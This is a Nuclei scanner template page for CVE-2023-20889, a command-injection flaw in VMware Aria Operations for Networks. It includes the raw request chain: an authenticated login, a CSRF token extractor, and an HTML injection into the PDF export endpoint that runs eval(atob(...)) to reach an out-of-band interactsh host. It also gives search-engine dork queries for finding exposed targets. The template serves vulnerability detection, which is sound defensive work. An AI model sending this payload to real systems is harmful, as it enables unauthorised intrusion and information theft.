VMware Aria Operations for Networks - Code Injection Information Disclosure Vulnerability
ID: CVE-2023-20889
Severity: high
Author: iamnoooob,rootxharsh,pdresearch
Tags: cve2023,cve,vmware,aria,disclosure,authenticated,rce,oast,intrusive
Description
Aria Operations for Networks contains an information disclosure vulnerability. A malicious actor with network access to VMware Aria Operations for Networks may be able to perform a command injection attack resulting in information disclosure.
YAML Source
id: CVE-2023-20889

info:
  name: VMware Aria Operations for Networks - Code Injection Information Disclosure Vulnerability
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    Aria Operations for Networks contains an information disclosure vulnerability. A malicious actor with network access to VMware Aria Operations for Networks may be able to perform a command injection attack resulting in information disclosure.
  impact: |
    Successful exploitation of this vulnerability can result in unauthorized access to sensitive information.
  remediation: |
    Apply the latest security patches provided by VMware to mitigate this vulnerability.
  reference:
    - https://www.zerodayinitiative.com/advisories/ZDI-23-842/
    - https://www.vmware.com/security/advisories/VMSA-2023-0012.html
    - https://nvd.nist.gov/vuln/detail/CVE-2023-20889
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-20889
    cwe-id: CWE-77
    epss-score: 0.37918
    epss-percentile: 0.9721
    cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: vmware
    product: vrealize_network_insight
    shodan-query:
      - title:"VMware Aria Operations"
      - http.title:"vmware vrealize network insight"
      - http.title:"vmware aria operations"
    fofa-query:
      - title="vmware vrealize network insight"
      - title="vmware aria operations"
    google-query:
      - intitle:"vmware aria operations"
      - intitle:"vmware vrealize network insight"
  tags: cve2023,cve,vmware,aria,disclosure,authenticated,rce,oast,intrusive

variables:
  payload: location='http://{{interactsh-url}}'

http:
  - raw:
      - |
        POST /api/auth/login HTTP/2
        Host: {{Hostname}}
        Content-Type: application/json;charset=UTF-8
        X-Vrni-Csrf-Token: null

        {"username":"{{username}}","password":"{{password}}","domain":"localdomain"}
      - |
        POST /api/pdfexport HTTP/2
        Host: {{Hostname}}
        X-Vrni-Csrf-Token: {{csrf}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFkpSYDWZ5w9YNjmh

        ------WebKitFormBoundaryFkpSYDWZ5w9YNjmh
        Content-Disposition: form-data; name="{{randstr}}"

        <!DOCTYPE HTML>
        <html>
        <head>
        <title>Test</title>
        </head>
        <body>
        <p data-vrni='vRealize'><style>@keyframes x{}</style><xss style="animation-name:x" onwebkitanimationstart="eval(atob('{{base64(payload)}}'))"></xss></p>
        </body>
        </html>
        ------WebKitFormBoundaryFkpSYDWZ5w9YNjmh--

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - dns
          - http

      - type: word
        part: header_2
        words:
          - application/octet-stream

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: csrf
        group: 1
        regex:
          - csrfToken":"([a-z0-9A-Z/+=]+)"
        internal: true
        part: body
# digest: 4a0a00473045022031bd10daab9f8b59de094f9790d829029d62d119136117e7acb3aa3360658e7d022100b7f7a574af117e63129ef88520d3bf2bc67ece24104b0796ccb7fd41c89eaae7:922c64590222798bb761d5b6d8e72950
Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-20889.yaml"